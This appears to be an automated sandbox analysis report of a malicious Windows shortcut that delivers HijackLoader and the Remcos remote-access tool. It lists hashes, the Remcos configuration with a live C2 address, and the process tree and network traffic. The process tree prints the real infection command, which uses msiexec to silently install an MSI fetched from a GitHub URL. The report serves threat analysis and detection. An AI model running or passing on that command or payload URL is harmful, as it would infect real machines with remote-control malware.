Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/02/2025, 03:26 UTC

General

  • Target

    420a17938095a53a781bf0f48a8ba394c16a974a076794fc65cb78c0a89a563f.lnk

  • Size

    1KB

  • MD5

    63b4ae48bfc52db08f3ad1008acff185

  • SHA1

    a2affc5d7b5211f97142c0def7ad9c430119e0b2

  • SHA256

    420a17938095a53a781bf0f48a8ba394c16a974a076794fc65cb78c0a89a563f

  • SHA512

    0c9fafdc316375aa4fd046a3ce485346c179d85092971707b1c61e57022a15e350a06f7f27faa3c9c110540f4161ed20b274f35b5cd4579df8d98f8387e85b4b

Malware Config

Extracted

Family

remcos

Botnet

v2

C2

185.157.162.126:1995

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    qsdazeazd-EL00KX

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Detects HijackLoader (aka IDAT Loader) 1 IoCs
  • HijackLoader

    HijackLoader is a multistage loader first seen in 2023.

  • Hijackloader family
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\420a17938095a53a781bf0f48a8ba394c16a974a076794fc65cb78c0a89a563f.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5048
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c #Verification660703 & msiexec /i https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi /qn
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:396
      • C:\Windows\system32\msiexec.exe
        msiexec /i https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi /qn
        3⤵
        • Use of msiexec (install) with remote resource
        • Suspicious use of AdjustPrivilegeToken
        PID:4064
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Adds Run key to start application
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4480
    • C:\Users\Admin\AppData\Roaming\IXXinstall\EHttpSrv.exe
      "C:\Users\Admin\AppData\Roaming\IXXinstall\EHttpSrv.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:4520
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd.exe
        3⤵
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:580
        • C:\Users\Admin\AppData\Roaming\IXXinstall\EHttpSrv.exe
          C:\Users\Admin\AppData\Roaming\IXXinstall\EHttpSrv.exe
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1408

Network

  • flag-us
    DNS
    github.com
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    20.26.156.215
  • flag-gb
    GET
    https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi
    msiexec.exe
    Remote address:
    20.26.156.215:443
    Request
    GET /leinchchanceleinch/jik/raw/refs/heads/main/d.msi HTTP/2.0
    host: github.com
    accept: */*
    user-agent: Windows Installer
    Response
    HTTP/2.0 302
    server: GitHub.com
    date: Wed, 19 Feb 2025 03:26:58 GMT
    content-type: text/html; charset=utf-8
    vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    access-control-allow-origin:
    location: https://raw.githubusercontent.com/leinchchanceleinch/jik/refs/heads/main/d.msi
    cache-control: no-cache
    strict-transport-security: max-age=31536000; includeSubdomains; preload
    x-frame-options: deny
    x-content-type-options: nosniff
    x-xss-protection: 0
    referrer-policy: no-referrer-when-downgrade
    content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
    content-length: 0
    x-github-request-id: E3CA:36865F:301572:3F30A2:67B54F81
  • flag-us
    DNS
    raw.githubusercontent.com
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    raw.githubusercontent.com
    IN A
    Response
    raw.githubusercontent.com
    IN A
    185.199.109.133
    raw.githubusercontent.com
    IN A
    185.199.108.133
    raw.githubusercontent.com
    IN A
    185.199.111.133
    raw.githubusercontent.com
    IN A
    185.199.110.133
  • flag-us
    GET
    https://raw.githubusercontent.com/leinchchanceleinch/jik/refs/heads/main/d.msi
    msiexec.exe
    Remote address:
    185.199.109.133:443
    Request
    GET /leinchchanceleinch/jik/refs/heads/main/d.msi HTTP/2.0
    host: raw.githubusercontent.com
    accept: */*
    user-agent: Windows Installer
    Response
    HTTP/2.0 200
    cache-control: max-age=300
    content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    content-type: application/octet-stream
    etag: "b7d280401ac36513e42c115aaf24920b95ef5fe0bbc3da004805cd38e18c0ff5"
    strict-transport-security: max-age=31536000
    x-content-type-options: nosniff
    x-frame-options: deny
    x-xss-protection: 1; mode=block
    x-github-request-id: 2EEF:3FCD02:62DFCC:83FD45:67B54F82
    accept-ranges: bytes
    date: Wed, 19 Feb 2025 03:26:58 GMT
    via: 1.1 varnish
    x-served-by: cache-lcy-eglc8600022-LCY
    x-cache: MISS
    x-cache-hits: 0
    x-timer: S1739935619.707987,VS0,VE159
    vary: Authorization,Accept-Encoding,Origin
    access-control-allow-origin: *
    cross-origin-resource-policy: cross-origin
    x-fastly-request-id: c373586021e488d9ee0eef741e29150686259d78
    expires: Wed, 19 Feb 2025 03:31:58 GMT
    source-age: 0
    content-length: 2990080
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.ax-0001.ax-msedge.net
    g-bing-com.ax-0001.ax-msedge.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7f8a3b3e46514b38b4b80ecf435cfecd&localId=w:ACAD5A90-4107-E38E-00E6-534476E14A0E&deviceId=6966575318233235&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7f8a3b3e46514b38b4b80ecf435cfecd&localId=w:ACAD5A90-4107-E38E-00E6-534476E14A0E&deviceId=6966575318233235&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=17CF774324576CED054462DB25FB6D81; domain=.bing.com; expires=Mon, 16-Mar-2026 03:26:59 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 2A0AAA8C334D407AA67BAE6690D2B12C Ref B: FRA31EDGE0812 Ref C: 2025-02-19T03:26:59Z
    date: Wed, 19 Feb 2025 03:26:58 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7f8a3b3e46514b38b4b80ecf435cfecd&localId=w:ACAD5A90-4107-E38E-00E6-534476E14A0E&deviceId=6966575318233235&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7f8a3b3e46514b38b4b80ecf435cfecd&localId=w:ACAD5A90-4107-E38E-00E6-534476E14A0E&deviceId=6966575318233235&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=17CF774324576CED054462DB25FB6D81
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=8Ld2ksezFQmZNF1epAsktZNT8N1e757CyHVctabtGSo; domain=.bing.com; expires=Mon, 16-Mar-2026 03:26:59 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 93C2B679476446D593B06D4F2BE5A0A1 Ref B: FRA31EDGE0812 Ref C: 2025-02-19T03:26:59Z
    date: Wed, 19 Feb 2025 03:26:58 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7f8a3b3e46514b38b4b80ecf435cfecd&localId=w:ACAD5A90-4107-E38E-00E6-534476E14A0E&deviceId=6966575318233235&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7f8a3b3e46514b38b4b80ecf435cfecd&localId=w:ACAD5A90-4107-E38E-00E6-534476E14A0E&deviceId=6966575318233235&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=17CF774324576CED054462DB25FB6D81; MSPTC=8Ld2ksezFQmZNF1epAsktZNT8N1e757CyHVctabtGSo
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 36D00B3052FE4A4E9E19D22F3AA4B23F Ref B: FRA31EDGE0812 Ref C: 2025-02-19T03:26:59Z
    date: Wed, 19 Feb 2025 03:26:58 GMT
  • 20.26.156.215:443
    https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi
    tls, http2
    msiexec.exe
    1.1kB
    7.9kB
    13
    13

    HTTP Request

    GET https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi

    HTTP Response

    302
  • 185.199.109.133:443
    https://raw.githubusercontent.com/leinchchanceleinch/jik/refs/heads/main/d.msi
    tls, http2
    msiexec.exe
    89.9kB
    3.1MB
    1670
    2244

    HTTP Request

    GET https://raw.githubusercontent.com/leinchchanceleinch/jik/refs/heads/main/d.msi

    HTTP Response

    200
  • 150.171.27.10:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7f8a3b3e46514b38b4b80ecf435cfecd&localId=w:ACAD5A90-4107-E38E-00E6-534476E14A0E&deviceId=6966575318233235&anid=
    tls, http2
    2.0kB
    9.4kB
    22
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7f8a3b3e46514b38b4b80ecf435cfecd&localId=w:ACAD5A90-4107-E38E-00E6-534476E14A0E&deviceId=6966575318233235&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7f8a3b3e46514b38b4b80ecf435cfecd&localId=w:ACAD5A90-4107-E38E-00E6-534476E14A0E&deviceId=6966575318233235&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7f8a3b3e46514b38b4b80ecf435cfecd&localId=w:ACAD5A90-4107-E38E-00E6-534476E14A0E&deviceId=6966575318233235&anid=

    HTTP Response

    204
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    356 B
    92 B
    4
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    510 B
    144 B
    4
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    132 B
    3
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    132 B
    3
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    132 B
    3
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    350 B
    132 B
    4
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    396 B
    132 B
    5
    3
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    304 B
    92 B
    3
    2
  • 8.8.8.8:53
    github.com
    dns
    msiexec.exe
    56 B
    72 B
    1
    1

    DNS Request

    github.com

    DNS Response

    20.26.156.215

  • 8.8.8.8:53
    raw.githubusercontent.com
    dns
    msiexec.exe
    71 B
    135 B
    1
    1

    DNS Request

    raw.githubusercontent.com

    DNS Response

    185.199.109.133
    185.199.108.133
    185.199.111.133
    185.199.110.133

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    148 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    150.171.27.10
    150.171.28.10

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Config.Msi\e58b7c4.rbs

    Filesize

    10KB

    MD5

    8175d1d1d0f5f17e2f0c0935d9713eec

    SHA1

    e94c03b5757b244aaf0c46b573fa3238c69edde5

    SHA256

    e6e2073032a4d72dc8864a1f65a81d7d1a084be8ad1188b9f0f6f22e43602852

    SHA512

    43f910b967e63f047326f35315a478cecd4bf1381e84304c3a17ee9c46a4559bc3055c3ed96c50d64bed65b9b5fceed1e0820fcd1c5e07bab84bacd975e6c9b6

  • C:\Users\Admin\AppData\Local\Temp\d534a9aa

    Filesize

    1.0MB

    MD5

    ddc41168ee985b1ab6627886378fe039

    SHA1

    eae236e911cf6e57cad66be2746079c451be1dfa

    SHA256

    7bca16038ddaa826a29fbc6b2ef34ed2aef7abc354bd17050301587829bc5583

    SHA512

    b0c2f29ba4479561a56432c499c1941f36226a61fb38283960ff2283ca82bbf285b92f5ab0d28788513bfe2c9db9d7eefb4c79321bcb74aea660d95f6c290016

  • C:\Users\Admin\AppData\Roaming\IXXinstall\EHttpSrv.exe

    Filesize

    20KB

    MD5

    9329ba45c8b97485926a171e34c2abb8

    SHA1

    20118bc0432b4e8b3660a4b038b20ca28f721e5c

    SHA256

    effa6fcb8759375b4089ccf61202a5c63243f4102872e64e3eb0a1bdc2727659

    SHA512

    0af06b5495142ba0632a46be0778a7bd3d507e9848b3159436aa504536919abbcacd8b740ef4b591296e86604b49e0642fee2c273a45e44b41a80f91a1d52acc

  • C:\Users\Admin\AppData\Roaming\IXXinstall\MFC80U.DLL

    Filesize

    1.0MB

    MD5

    686b224b4987c22b153fbb545fee9657

    SHA1

    684ee9f018fbb0bbf6ffa590f3782ba49d5d096c

    SHA256

    a2ac851f35066c2f13a7452b7a9a3fee05bfb42907ae77a6b85b212a2227fc36

    SHA512

    44d65db91ceea351d2b6217eaa27358dbc2ed27c9a83d226b59aecb336a9252b60aec5ce5e646706a2af5631d5ee0f721231ec751e97e47bbbc32d5f40908875

  • C:\Users\Admin\AppData\Roaming\IXXinstall\audiogram.tif

    Filesize

    877KB

    MD5

    5124236fd955464317fbb1f344a1d2f2

    SHA1

    fe3a91e252f1dc3c3b4980ade7157369ea6f5097

    SHA256

    ed1389002cdf96c9b54de35b6e972166ee3296d628943fd594a383e674c5cba6

    SHA512

    2b2ac23244b16f936ef9a4049586f58c809fcc4391a56390cc5db2e8d96140001e0b977680ed1d8b0ab9c410e865a880209e22add8d42e563dc40bc91236b252

  • C:\Users\Admin\AppData\Roaming\IXXinstall\http_dll.dll

    Filesize

    1.9MB

    MD5

    fe47e255c704b20cb20c8ed93ec94d47

    SHA1

    ed7d26624b3cfaa72cf7d3bc59d26845fb84247a

    SHA256

    b0d665cb466e10ef90e1d79a39cb655ebe785d0cefc074f7a22d04936b681879

    SHA512

    55813a4b755773f98991b47294fed03b23d5bee9af3ef98727b7345882fe0d9976546f46847fbc30119e7c62ce7ee8ae21f54065922041cf8d42364e607bc1c0

  • C:\Windows\Installer\MSIB4E4.tmp

    Filesize

    2.9MB

    MD5

    ae5b94abf028388af1454ed76806cc6f

    SHA1

    ef013c7eec6fc6c14ccd414b5eb87abf1476566a

    SHA256

    f286d2b89eaebb2e1e6e23a44bc92dae7c058348286810549f4c7514c9ea61ad

    SHA512

    b88c3c160b68b0bdc03780a6848001aef7baa5532b815071eb4f26ff1caa87f71b2401b0c507db5389d14517310bae758aaa17f6fe7aa508f2de38cdbcac1fe2

  • memory/580-42-0x00007FFE53E90000-0x00007FFE54085000-memory.dmp

    Filesize

    2.0MB

  • memory/580-44-0x0000000075220000-0x000000007539B000-memory.dmp

    Filesize

    1.5MB

  • memory/1408-57-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/1408-55-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/1408-46-0x0000000073720000-0x0000000074974000-memory.dmp

    Filesize

    18.3MB

  • memory/1408-48-0x00007FFE53E90000-0x00007FFE54085000-memory.dmp

    Filesize

    2.0MB

  • memory/1408-49-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/1408-52-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/1408-53-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/1408-63-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/1408-56-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

  • memory/1408-62-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

